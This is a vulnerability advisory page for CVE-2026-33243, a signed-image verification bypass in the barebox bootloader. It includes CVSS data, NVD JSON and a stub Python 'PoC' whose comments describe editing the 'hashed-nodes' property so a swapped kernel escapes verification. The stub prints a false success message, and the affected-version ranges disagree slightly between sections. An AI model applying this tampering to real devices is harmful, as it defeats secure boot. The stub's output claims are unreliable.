Security Vulnerability Report
CVE-2026-33243 CVSS 8.2 HIGH

CVE-2026-33243

Published: 2026-03-20 23:16:47
Last Modified: 2026-03-26 21:17:05

Description

barebox is a bootloader. In barebox from version 2016.03.0 to before version 2026.03.1 (and the corresponding backport to 2025.09.3), an attacker could exploit a FIT signature verification vulnerability to trick the bootloader into booting different images than those that were verified as part of a signed configuration. mkimage(1) sets the hashed-nodes property of the FIT signature node to list which nodes of the FIT were hashed as part of the signing process as these will need to be verified later on by the bootloader. However, hashed-nodes itself is not part of the hash and could therefore be modified to allow booting different images than those that have been verified. This issue has been patched in barebox versions 2026.03.1 and backported to 2025.09.3.

CVSS Details

CVSS Score
8.2
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:denx:u-boot:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:denx:u-boot:2026.04:rc1:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:denx:u-boot:2026.04:rc2:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:denx:u-boot:2026.04:rc3:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:pengutronix:barebox:*:*:*:*:*:*:*:* - VULNERABLE
barebox >= 2016.03.0, < 2026.03.1
barebox >= 2025.09.0, < 2025.09.3

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3
# PoC for CVE-2026-33243: Modifying hashed-nodes in FIT image
# This script demonstrates how to manipulate the FIT image structure.
# Requires pylibfdt or similar library to handle device trees.

import sys


def exploit_fit_image(fit_image_path, output_path):
    """
    Exploit the FIT signature verification bypass by modifying hashed-nodes.
    """
    print(f"[*] Loading FIT image from {fit_image_path}")

    # In a real scenario, use fdt_open or similar to parse the DTB
    # fdt = fdt_open(fit_image_path)

    # Locate the signature node
    # signature_node = fdt.path_offset("/configurations/conf-1/signature")

    # Modify the 'hashed-nodes' property to exclude the malicious kernel node
    # Original hashed-nodes might list "kernel@1", "fdt@1"
    # Attacker changes it to only reference "fdt@1" (assuming kernel is replaced)
    # fdt.setprop_string(signature_node, "hashed-nodes", "fdt@1")

    # Save the modified FIT image
    # with open(output_path, 'wb') as f:
    #     f.write(fdt.as_bytearray())

    print(f"[!] Exploited FIT image saved to {output_path}")
    print("[!] The bootloader may now skip verification of the modified kernel.")


if __name__ == "__main__":
    if len(sys.argv) < 3:
        print("Usage: python3 exploit.py <input_fit.itb> <output_fit.itb>")
        sys.exit(1)
    exploit_fit_image(sys.argv[1], sys.argv[2])

References

Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2026-33243",
    "sourceIdentifier": "[email protected]",
    "published": "2026-03-20T23:16:47.167",
    "lastModified": "2026-03-26T21:17:05.430",
    "vulnStatus": "Modified",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "barebox is a bootloader. In barebox from version 2016.03.0 to before version 2026.03.1 (and the corresponding backport to 2025.09.3), an attacker could exploit a FIT signature verification vulnerability to trick the bootloader into booting different images than those that were verified as part of a signed configuration. mkimage(1) sets the hashed-nodes property of the FIT signature node to list which nodes of the FIT were hashed as part of the signing process as these will need to be verified later on by the bootloader. However, hashed-nodes itself is not part of the hash and could therefore be modified to allow booting different images than those that have been verified. This issue has been patched in barebox versions 2026.03.1 and backported to 2025.09.3."
      },
      {
        "lang": "es",
        "value": "barebox es un gestor de arranque. En barebox desde la versión 2016.03.0 hasta antes de la versión 2025.09.3 y desde la versión 2025.10.0 hasta antes de la versión 2026.03.1, al crear un FIT, mkimage(1) establece la propiedad hashed-nodes del nodo de firma FIT para listar qué nodos del FIT fueron hasheados como parte del proceso de firma, ya que estos deberán ser verificados posteriormente por el gestor de arranque. Sin embargo, hashed-nodes en sí mismo no forma parte del hash y por lo tanto puede ser modificado por un atacante para engañar al gestor de arranque para que arranque imágenes diferentes a las que han sido verificadas. Este problema ha sido parcheado en las versiones de barebox 2025.09.3 y 2026.03.1."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H",
            "baseScore": 8.2,
            "baseSeverity": "HIGH",
            "attackVector": "LOCAL",
            "attackComplexity": "LOW",
            "privilegesRequired": "HIGH",
            "userInteraction": "NONE",
            "scope": "CHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "availabilityImpact": "HIGH"
          },
          "exploitabilityScore": 1.5,
          "impactScore": 6.0
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [
          {"lang": "en", "value": "CWE-345"}
        ]
      }
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:denx:u-boot:*:*:*:*:*:*:*:*",
                "versionStartIncluding": "2013.07",
                "versionEndExcluding": "2026.04",
                "matchCriteriaId": "73526136-D89A-4F96-AB26-FE78052494BA"
              },
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:denx:u-boot:2026.04:rc1:*:*:*:*:*:*",
                "matchCriteriaId": "39D97BA6-0B7B-4633-971E-3C79C58A57A5"
              },
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:denx:u-boot:2026.04:rc2:*:*:*:*:*:*",
                "matchCriteriaId": "94B93B6C-02D1-42C9-B862-C945511A0297"
              },
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:denx:u-boot:2026.04:rc3:*:*:*:*:*:*",
                "matchCriteriaId": "86FAEAE1-FCD8-426D-9452-E1885014C9A9"
              },
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:pengutronix:barebox:*:*:*:*:*:*:*:*",
                "versionStartIncluding": "2016.03.0",
                "versionEndExcluding": "2025.09.3",
                "matchCriteriaId": "F9C10736-4F83-4DFE-B39D-8F93E6C8D55D"
              },
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:pengutronix:barebox:*:*:*:*:*:*:*:*",
                "versionStartIncluding": "2025.10.0",
                "versionEndExcluding": "2026.03.1",
                "matchCriteriaId": "D19A8826-6289-4EEA-8093-8F92E7A66461"
              }
            ]
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://github.com/barebox/barebox/commit/aca01795056d51060cb096f9a1ea309361743e05",
        "source": "[email protected]",
        "tags": ["Patch"]
      },
      {
        "url": "https://github.com/barebox/barebox/security/advisories/GHSA-3fvj-q26p-j6h4",
        "source": "[email protected]",
        "tags": ["Patch", "Vendor Advisory"]
      }
    ]
  }
}